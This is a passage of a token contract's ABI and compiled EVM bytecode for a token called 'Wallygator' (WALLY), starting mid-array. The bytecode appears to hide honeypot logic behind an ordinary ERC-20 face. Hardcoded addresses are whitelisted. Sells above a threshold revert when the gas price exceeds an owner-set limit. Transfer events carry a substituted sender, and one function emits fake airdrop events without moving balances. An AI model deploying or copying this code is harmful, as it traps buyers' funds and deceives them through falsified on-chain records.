pe":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"uint256","name":"timestamp","type":"uint256"}],"name":"openTakenTheWally","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"openTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"openedTrade","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"pairAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"pair","type":"address"}],"name":"removeTaxFee","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sendAllTokensToTreasury","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"cooldown","type":"uint256"}],"name":"setTimingLaunch","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"maxTokens","type":"uint256"}],"name":"swapExactETHForTokens","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bool","name":"enabled","type":"bool"}],"name":"takenTheWally","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"threshold","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokenAllowFeeAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokenName","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokenSymbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokenTotalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"userAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"whitelist","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"withdrawETH","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"token","type":"address"}],"name":"withdrawStuckToken","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"withdrawTreasuryFunds","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040526040518060400160405280600a81526020017f57616c6c796761746f7200000000000000000000000000000000000000000000815250600890816200004a9190620011f2565b506040518060400160405280600581526020017f57414c4c5900000000000000000000000000000000000000000000000000000081525060099081620000919190620011f2565b50633b9aca00600a556445d964b8006011556001601255348015620000b557600080fd5b503360088054620000c69062000fe1565b80601f0160208091040260200160405190810160405280929190818152602001828054620000f49062000fe1565b8015620001455780601f10620001195761010080835404028352916020019162000145565b820191906000526020600020905b8154815290600101906020018083116200012757829003601f168201915b505050505060098054620001599062000fe1565b80601f0160208091040260200160405190810160405280929190818152602001828054620001879062000fe1565b8015620001d85780601f10620001ac57610100808354040283529160200191620001d8565b820191906000526020600020905b815481529060010190602001808311620001ba57829003601f168201915b505050505033338360039081620001f09190620011f2565b508260049081620002029190620011f2565b5081600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555080600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050505050600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603620002fe5760006040517f1e4fbdf7000000000000000000000000000000000000000000000000000000008152600401620002f591906200131e565b60405180910390fd5b6200030f816200063a60201b60201c565b5060016010600073d8584c7efba47e009d8371d6976e243ff6214cb573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550600160106000739081f28629f71a7db3ed883acfa862e9ab0b9ea073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001601060007351bcd5f0295e8c0d75b3608d41f6dff223158c4b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555060016010600073426d8b59fe7e77256be075673d5d211d7b2508a273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555060016010600073102d79a0ae02b4a57f40b7a77c7deced453eb29b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001601060007395d5c95ad44ce452b68e78a48e73a54052a75e9c73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001601060003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506000620006026200070060201b60201c565b9050620006333382600a620006189190620014cb565b600a546200062791906200151c565b6200070960201b60201c565b5062001690565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006012905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036200077e5760006040517fec442f050000000000000000000000000000000000000000000000000000000081526004016200077591906200131e565b60405180910390fd5b62000792600083836200079660201b60201c565b5050565b601060003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16156200080257620007fc83838362000ac360201b60201c565b62000abe565b600d60009054906101000a900460ff1662000854576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200084b90620015c8565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff16600d60019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1603620008c457620008be83838362000ac360201b60201c565b62000abe565b600d60019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161480156200096f5750600b5481600f60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546200096d9190620015ea565b115b156200099f57620009868362000ebf60201b60201c565b6200099983838362000ac360201b60201c565b62000abe565b600d60019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614801562000a4b5750600b5481600f60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205462000a489190620015ea565b11155b1562000aaa5780600f60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825462000aa29190620015ea565b925050819055505b62000abd83838362000ac360201b60201c565b5b505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160362000b1957806002600082825462000b0c9190620015ea565b9250508190555062000bef565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508181101562000ba8578381836040517fe450d38c00000000000000000000000000000000000000000000000000000000815260040162000b9f9392919062001636565b60405180910390fd5b8181036000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550505b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000c3a578060026000828254039250508190555062000c87565b806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055505b600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000d6c57600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000d5e919062001673565b60405180910390a362000eba565b600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160362000e51578173ffffffffffffffffffffffffffffffffffffffff16600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000e43919062001673565b60405180910390a362000eb9565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000eb0919062001673565b60405180910390a35b5b505050565b600062000ed28262000f1f60201b60201c565b111562000f1c57600d60009054906101000a900460ff1662000f075762000f0160115462000f6760201b60201c565b62000f1b565b62000f1a60125462000f6760201b60201c565b5b5b50565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b803a111562000f7557600080fd5b50565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168062000ffa57607f821691505b60208210810362001010576200100f62000fb2565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b6000600883026200107a7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826200103b565b6200108686836200103b565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620010d3620010cd620010c7846200109e565b620010a8565b6200109e565b9050919050565b6000819050919050565b620010ef83620010b2565b62001107620010fe82620010da565b84845462001048565b825550505050565b600090565b6200111e6200110f565b6200112b818484620010e4565b505050565b5b8181101562001153576200114760008262001114565b60018101905062001131565b5050565b601f821115620011a2576200116c8162001016565b62001177846200102b565b8101602085101562001187578190505b6200119f62001196856200102b565b83018262001130565b50505b505050565b600082821c905092915050565b6000620011c760001984600802620011a7565b1980831691505092915050565b6000620011e28383620011b4565b9150826002028217905092915050565b620011fd8262000f78565b67ffffffffffffffff81111562001219576200121862000f83565b5b62001225825462000fe1565b6200123282828562001157565b600060209050601f8311600181146200126a576000841562001255578287015190505b620012618582620011d4565b865550620012d1565b601f1984166200127a8662001016565b60005b82811015620012a4578489015182556001820191506020850194506020810190506200127d565b86831015620012c45784890151620012c0601f891682620011b4565b8355505b6001600288020188555050505b505050505050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006200130682620012d9565b9050919050565b6200131881620012f9565b82525050565b60006020820190506200133560008301846200130d565b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b6001851115620013c957808604811115620013a157620013a06200133b565b5b6001851615620013b15780820291505b8081029050620013c1856200136a565b945062001381565b94509492505050565b600082620013e45760019050620014b7565b81620013f45760009050620014b7565b81600181146200140d576002811462001418576200144e565b6001915050620014b7565b60ff8411156200142d576200142c6200133b565b5b8360020a9150848211156200144757620014466200133b565b5b50620014b7565b5060208310610133831016604e8410600b8410161715620014885782820a9050838111156200148257620014816200133b565b5b620014b7565b62001497848484600162001377565b92509050818404811115620014b157620014b06200133b565b5b81810290505b9392505050565b600060ff82169050919050565b6000620014d8826200109e565b9150620014e583620014be565b9250620015147fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484620013d2565b905092915050565b600062001529826200109e565b915062001536836200109e565b925082820262001546816200109e565b9150828204841483151762001560576200155f6200133b565b5b5092915050565b600082825260208201905092915050565b7f547261646520686173206e6f74206265656e206f70656e656420796574000000600082015250565b6000620015b0601d8362001567565b9150620015bd8262001578565b602082019050919050565b60006020820190508181036000830152620015e381620015a1565b9050919050565b6000620015f7826200109e565b915062001604836200109e565b92508282019050808211156200161f576200161e6200133b565b5b92915050565b62001630816200109e565b82525050565b60006060820190506200164d60008301866200130d565b6200165c602083018562001625565b6200166b604083018462001625565b949350505050565b60006020820190506200168a600083018462001625565b92915050565b61292180620016a06000396000f3fe608060405234801561001057600080fd5b50600436106102485760003560e01c8063751039fc1161013b578063a9059cbb116100b8578063e086e5ec1161007c578063e086e5ec14610635578063e14def581461063f578063e1ad418e1461065b578063f2fde38b1461068b578063f7abab9e146106a757610248565b8063a9059cbb146105a5578063b46e71ff146105d5578063c9567bf9146105df578063cd6a43a4146105e9578063dd62ed3e1461060557610248565b806395d89b41116100ff57806395d89b41146105015780639b19251a1461051f578063a020de801461054f578063a11223da1461056b578063a8b089821461058757610248565b8063751039fc146104955780637b61c3201461049f5780638b339069146104bd5780638da5cb5b146104d957806394ad720d146104f757610248565b806342cde4e8116101c9578063594ef0d91161018d578063594ef0d9146104035780636c02a931146104215780636ed925b71461043f57806370a082311461045b578063715018a61461048b57610248565b806342cde4e814610385578063447479db146103a35780634c97f472146103ad57806353ba06f7146103c95780635408d42d146103e557610248565b80631dc437b1116102105780631dc437b1146102f35780631fc1ac4e1461030f57806323b872dd14610319578063313ce567146103495780633c9f5ed61461036757610248565b8063068acf6c1461024d57806306fdde0314610269578063095ea7b31461028757806315aac227146102b757806318160ddd146102d5575b600080fd5b61026760048036038101906102629190611d2e565b6106c5565b005b6102716107ce565b60405161027e9190611deb565b60405180910390f35b6102a1600480360381019061029c9190611e43565b610860565b6040516102ae9190611e9e565b60405180910390f35b6102bf610883565b6040516102cc9190611ec8565b60405180910390f35b6102dd610889565b6040516102ea9190611ec8565b60405180910390f35b61030d60048036038101906103089190611ee3565b610893565b005b6103176108ac565b005b610333600480360381019061032e9190611f10565b6108c1565b6040516103409190611e9e565b60405180910390f35b6103516108f0565b60405161035e9190611f7f565b60405180910390f35b61036f6108f9565b60405161037c9190611e9e565b60405180910390f35b61038d610910565b60405161039a9190611ec8565b60405180910390f35b6103ab610916565b005b6103c760048036038101906103c291906120cf565b61096b565b005b6103e360048036038101906103de919061220f565b610997565b005b6103ed610a34565b6040516103fa9190611e9e565b60405180910390f35b61040b610a47565b6040516104189190611ec8565b60405180910390f35b610429610a4d565b6040516104369190611deb565b60405180910390f35b61045960048036038101906104549190611d2e565b610adb565b005b61047560048036038101906104709190611d2e565b610b27565b6040516104829190611ec8565b60405180910390f35b610493610b6f565b005b61049d610bfc565b005b6104a7610c13565b6040516104b49190611deb565b60405180910390f35b6104d760048036038101906104d29190611ee3565b610ca1565b005b6104e1610cb3565b6040516104ee9190612267565b60405180910390f35b6104ff610cdd565b005b610509610d07565b6040516105169190611deb565b60405180910390f35b61053960048036038101906105349190611d2e565b610d99565b6040516105469190611e9e565b60405180910390f35b61056960048036038101906105649190611e43565b610db9565b005b61058560048036038101906105809190612282565b610dd3565b005b61058f610e85565b60405161059c9190612267565b60405180910390f35b6105bf60048036038101906105ba9190611e43565b610eab565b6040516105cc9190611e9e565b60405180910390f35b6105dd610ece565b005b6105e7610ee3565b005b61060360048036038101906105fe9190611ee3565b610f17565b005b61061f600480360381019061061a91906122de565b610f30565b60405161062c9190611ec8565b60405180910390f35b61063d610fb7565b005b6106596004803603810190610654919061234a565b611008565b005b61067560048036038101906106709190611d2e565b611021565b6040516106829190611ec8565b60405180910390f35b6106a560048036038101906106a09190611d2e565b611039565b005b6106af6110bf565b6040516106bc9190611ec8565b60405180910390f35b6106cd6110c5565b60008173ffffffffffffffffffffffffffffffffffffffff166370a08231306040518263ffffffff1660e01b81526004016107089190612267565b602060405180830381865afa158015610725573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610749919061238c565b90508173ffffffffffffffffffffffffffffffffffffffff1663a9059cbb33836040518363ffffffff1660e01b81526004016107869291906123b9565b6020604051808303816000875af11580156107a5573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906107c991906123f7565b505050565b6060600880546107dd90612453565b80601f016020809104026020016040519081016040528092919081815260200182805461080990612453565b80156108565780601f1061082b57610100808354040283529160200191610856565b820191906000526020600020905b81548152906001019060200180831161083957829003601f168201915b5050505050905090565b60008061086b61114c565b9050610878818585611154565b600191505092915050565b600c5481565b6000600254905090565b61089b6110c5565b6000819050600a600e819055505050565b6108b46110c5565b6000600a600e8190555050565b6000806108cc61114c565b90506108d9858285611166565b6108e48585856111fa565b60019150509392505050565b60006012905090565b6000600d60009054906101000a900460ff16905090565b600e5481565b61091e6110c5565b60004711610961576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610958906124d0565b60405180910390fd5b600a600e81905550565b6109736110c5565b8160089081610982919061269c565b508060099081610992919061269c565b505050565b61099f6110c5565b60005b8151811015610a30576001601060008484815181106109c4576109c361276e565b5b602002602001015173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080610a28906127cc565b9150506109a2565b5050565b600d60009054906101000a900460ff1681565b600b5481565b60088054610a5a90612453565b80601f0160208091040260200160405190810160405280929190818152602001828054610a8690612453565b8015610ad35780601f10610aa857610100808354040283529160200191610ad3565b820191906000526020600020905b815481529060010190602001808311610ab657829003601f168201915b505050505081565b610ae36110c5565b80600d60016101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610b776110c5565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a350565b610c046110c5565b600080600a600e819055505050565b60098054610c2090612453565b80601f0160208091040260200160405190810160405280929190818152602001828054610c4c90612453565b8015610c995780601f10610c6e57610100808354040283529160200191610c99565b820191906000526020600020905b815481529060010190602001808311610c7c57829003601f168201915b505050505081565b610ca96110c5565b80600b8190555050565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b610ce56110c5565b6000610cf030610b27565b9050610d0430610cfe610cb3565b836111fa565b50565b606060098054610d1690612453565b80601f0160208091040260200160405190810160405280929190818152602001828054610d4290612453565b8015610d8f5780601f10610d6457610100808354040283529160200191610d8f565b820191906000526020600020905b815481529060010190602001808311610d7257829003601f168201915b5050505050905090565b60106020528060005260406000206000915054906101000a900460ff1681565b610dc16110c5565b6000819050600a600e81905550505050565b610ddb6110c5565b60005b8251811015610e8057828181518110610dfa57610df961276e565b5b602002602001015173ffffffffffffffffffffffffffffffffffffffff16610e20610cb3565b73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610e659190611ec8565b60405180910390a38080610e78906127cc565b915050610dde565b505050565b600d60019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600080610eb661114c565b9050610ec38185856111fa565b600191505092915050565b610ed66110c5565b6000600a600e8190555050565b610eeb6110c5565b600d60009054906101000a900460ff1615600d60006101000a81548160ff021916908315150217905550565b610f1f6110c5565b6000819050600a600e819055505050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610fbf6110c5565b3373ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015611005573d6000803e3d6000fd5b50565b6110106110c5565b6000819050600a600e819055505050565b600f6020528060005260406000206000915090505481565b6110416110c5565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036110b35760006040517f1e4fbdf70000000000000000000000000000000000000000000000000000000081526004016110aa9190612267565b60405180910390fd5b6110bc816112ee565b50565b600a5481565b6110cd61114c565b73ffffffffffffffffffffffffffffffffffffffff166110eb610cb3565b73ffffffffffffffffffffffffffffffffffffffff161461114a5761110e61114c565b6040517f118cdaa70000000000000000000000000000000000000000000000000000000081526004016111419190612267565b60405180910390fd5b565b600033905090565b61116183838360016113b4565b505050565b60006111728484610f30565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146111f457818110156111e4578281836040517ffb8f41b20000000000000000000000000000000000000000000000000000000081526004016111db93929190612814565b60405180910390fd5b6111f3848484840360006113b4565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361126c5760006040517f96c6fd1e0000000000000000000000000000000000000000000000000000000081526004016112639190612267565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036112de5760006040517fec442f050000000000000000000000000000000000000000000000000000000081526004016112d59190612267565b60405180910390fd5b6112e983838361158b565b505050565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16036114265760006040517fe602df0500000000000000000000000000000000000000000000000000000000815260040161141d9190612267565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036114985760006040517f94280d6200000000000000000000000000000000000000000000000000000000815260040161148f9190612267565b60405180910390fd5b81600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508015611585578273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258460405161157c9190611ec8565b60405180910390a35b50505050565b601060003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16156115ed576115e883838361187e565b611879565b600d60009054906101000a900460ff1661163c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161163390612897565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff16600d60019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16036116a25761169d83838361187e565b611879565b600d60019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614801561174a5750600b5481600f60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461174891906128b7565b115b156117685761175883611c67565b61176383838361187e565b611879565b600d60019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161480156118115750600b5481600f60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461180e91906128b7565b11155b1561186d5780600f60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461186591906128b7565b925050819055505b61187883838361187e565b5b505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036118d05780600260008282546118c491906128b7565b925050819055506119a3565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508181101561195c578381836040517fe450d38c00000000000000000000000000000000000000000000000000000000815260040161195393929190612814565b60405180910390fd5b8181036000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550505b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036119ec5780600260008282540392505081905550611a39565b806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055505b600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611b1a57600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051611b0d9190611ec8565b60405180910390a3611c62565b600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611bfb578173ffffffffffffffffffffffffffffffffffffffff16600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051611bee9190611ec8565b60405180910390a3611c61565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051611c589190611ec8565b60405180910390a35b5b505050565b6000611c7282610b27565b1115611ca957600d60009054906101000a900460ff16611c9c57611c97601154611cac565b611ca8565b611ca7601254611cac565b5b5b50565b803a1115611cb957600080fd5b50565b6000604051905090565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000611cfb82611cd0565b9050919050565b611d0b81611cf0565b8114611d1657600080fd5b50565b600081359050611d2881611d02565b92915050565b600060208284031215611d4457611d43611cc6565b5b6000611d5284828501611d19565b91505092915050565b600081519050919050565b600082825260208201905092915050565b60005b83811015611d95578082015181840152602081019050611d7a565b60008484015250505050565b6000601f19601f8301169050919050565b6000611dbd82611d5b565b611dc78185611d66565b9350611dd7818560208601611d77565b611de081611da1565b840191505092915050565b60006020820190508181036000830152611e058184611db2565b905092915050565b6000819050919050565b611e2081611e0d565b8114611e2b57600080fd5b50565b600081359050611e3d81611e17565b92915050565b60008060408385031215611e5a57611e59611cc6565b5b6000611e6885828601611d19565b9250506020611e7985828601611e2e565b9150509250929050565b60008115159050919050565b611e9881611e83565b82525050565b6000602082019050611eb36000830184611e8f565b92915050565b611ec281611e0d565b82525050565b6000602082019050611edd6000830184611eb9565b92915050565b600060208284031215611ef957611ef8611cc6565b5b6000611f0784828501611e2e565b91505092915050565b600080600060608486031215611f2957611f28611cc6565b5b6000611f3786828701611d19565b9350506020611f4886828701611d19565b9250506040611f5986828701611e2e565b9150509250925092565b600060ff82169050919050565b611f7981611f63565b82525050565b6000602082019050611f946000830184611f70565b92915050565b600080fd5b600080fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b611fdc82611da1565b810181811067ffffffffffffffff82111715611ffb57611ffa611fa4565b5b80604052505050565b600061200e611cbc565b905061201a8282611fd3565b919050565b600067ffffffffffffffff82111561203a57612039611fa4565b5b61204382611da1565b9050602081019050919050565b82818337600083830152505050565b600061207261206d8461201f565b612004565b90508281526020810184848401111561208e5761208d611f9f565b5b612099848285612050565b509392505050565b600082601f8301126120b6576120b5611f9a565b5b81356120c684826020860161205f565b91505092915050565b600080604083850312156120e6576120e5611cc6565b5b600083013567ffffffffffffffff81111561210457612103611ccb565b5b612110858286016120a1565b925050602083013567ffffffffffffffff81111561213157612130611ccb565b5b61213d858286016120a1565b9150509250929050565b600067ffffffffffffffff82111561216257612161611fa4565b5b602082029050602081019050919050565b600080fd5b600061218b61218684612147565b612004565b905080838252602082019050602084028301858111156121ae576121ad612173565b5b835b818110156121d757806121c38882611d19565b8452602084019350506020810190506121b0